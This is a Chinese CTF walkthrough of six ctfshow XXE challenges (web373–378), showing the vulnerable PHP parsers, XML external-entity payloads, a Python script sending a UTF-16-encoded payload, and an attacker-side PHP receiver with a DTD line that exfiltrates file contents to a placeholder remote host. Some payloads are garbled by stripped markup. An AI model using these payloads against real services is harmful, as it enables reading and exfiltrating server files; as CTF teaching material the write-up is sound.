ctfshow web入门-XXE

ctfshow web入门-XXE

  • web373
    • 题目描述
    • 解题思路
  • web374
    • 题目描述
    • 解题思路
  • web375
    • 题目描述
    • 解题思路
  • web376
    • 题目描述
    • 解题思路
  • web377
    • 题目描述
    • 解题思路
  • web378
    • 题目描述
    • 解题思路

web373

题目描述

  • 开X

解题思路

  • 题目给出源码,一个有回显的文件读取漏洞

error_reporting(0);
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
if(isset($xmlfile)){
    $dom = new DOMDocument();
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
    $creds = simplexml_import_dom($dom);
    $ctfshow = $creds->ctfshow;
    echo $ctfshow;
}
highlight_file(__FILE__);
?>
  • 抓包发送如下内容

DOCTYPE xml [

]>
<H3rmesk1t>
	<ctfshow>
		&xxe;
	ctfshow>
H3rmesk1t>

ctfshow web入门-XXE_第1张图片

web374

题目描述

  • 开X

解题思路

  • 无回显的文件读取,需要进行外带

error_reporting(0);
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
if(isset($xmlfile)){
    $dom = new DOMDocument();
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
}
highlight_file(__FILE__); 
?>
  • 抓包发送如下内容
DOCTYPE ANY[


%remote;
%send;
]>
  • 在服务器放置 xxe.phpxxe.xml 两个文件

$content = $_GET['1'];
if(isset($content)){
    
      
    file_put_contents('flag.txt','更新时间:'.date("Y-m-d H:i:s")."\n".$content);
}else{
    
      
    echo 'no data input';
}
% send SYSTEM 'http://xxx.xxx.xxx.xxx:xxxx/xxe.php?1=%file;'"
>
%all;

ctfshow web入门-XXE_第2张图片

web375

题目描述

  • 开X

解题思路

  • 无回显的文件读取,且禁用了版本号,和上面一样进行外带不写版本号即可

error_reporting(0);
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
if(preg_match('/<\?xml version="1\.0"/', $xmlfile)){
    die('error');
}
if(isset($xmlfile)){
    $dom = new DOMDocument();
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
}
highlight_file(__FILE__);  
?>
  • 抓包发送如下内容
DOCTYPE ANY[


%remote;
%send;
]>
  • 在服务器放置 xxe.phpxxe.xml 两个文件

$content = $_GET['1'];
if(isset($content)){
    
      
    file_put_contents('flag.txt','更新时间:'.date("Y-m-d H:i:s")."\n".$content);
}else{
    
      
    echo 'no data input';
}
% send SYSTEM 'http://xxx.xxx.xxx.xxx:xxxx/xxe.php?1=%file;'"
>
%all;

在这里插入图片描述

web376

题目描述

  • 开X

解题思路

  • 无回显的文件读取,且禁用了版本号,和上面一样进行外带不写版本号即可

error_reporting(0);
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
if(preg_match('/<\?xml version="1\.0"/i', $xmlfile)){
    die('error');
}
if(isset($xmlfile)){
    $dom = new DOMDocument();
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
}
highlight_file(__FILE__);  
?>
  • 抓包发送如下内容
DOCTYPE ANY[


%remote;
%send;
]>
  • 在服务器放置 xxe.phpxxe.xml 两个文件

$content = $_GET['1'];
if(isset($content)){
    
      
    file_put_contents('flag.txt','更新时间:'.date("Y-m-d H:i:s")."\n".$content);
}else{
    
      
    echo 'no data input';
}
% send SYSTEM 'http://xxx.xxx.xxx.xxx:xxxx/xxe.php?1=%file;'"
>
%all;

在这里插入图片描述

web377

题目描述

  • 开X

解题思路

  • 无回显的文件读取,且禁用了版本号和http,和上面一样进行外带不写版本号改成利用 utf-16 编码即可

error_reporting(0);
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
if(preg_match('/<\?xml version="1\.0"|http/i', $xmlfile)){
    die('error');
}
if(isset($xmlfile)){
    $dom = new DOMDocument();
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
}
highlight_file(__FILE__);    
?>
  • 利用 Python 进行发包
import requests
url = 'http://00edd7b9-7fc6-40fd-937d-deb477902dca.challenge.ctf.show:8080/'
payload = '''


%remote;
%send;
]>
'''
payload = payload.encode('utf-16')
rep = requests.post(url=url, data=payload)
print(rep.text)
  • 在服务器放置 xxe.phpxxe.xml 两个文件

$content = $_GET['1'];
if(isset($content)){
    
      
    file_put_contents('flag.txt','更新时间:'.date("Y-m-d H:i:s")."\n".$content);
}else{
    
      
    echo 'no data input';
}
% send SYSTEM 'http://xxx.xxx.xxx.xxx:xxxx/xxe.php?1=%file;'"
>
%all;

ctfshow web入门-XXE_第3张图片

web378

题目描述

  • python X

解题思路

  • 登录框抓个包,发现是回显 xml 形式,而且是回显 username 的值,构造 Payload

DOCTYPE ANY [

]>
<user><username>&file;username><password>apassword>user>

ctfshow web入门-XXE_第4张图片

你可能感兴趣的:(#,ctfshow-web,XML,XXE外部实体注入,ctfshow,WEB安全)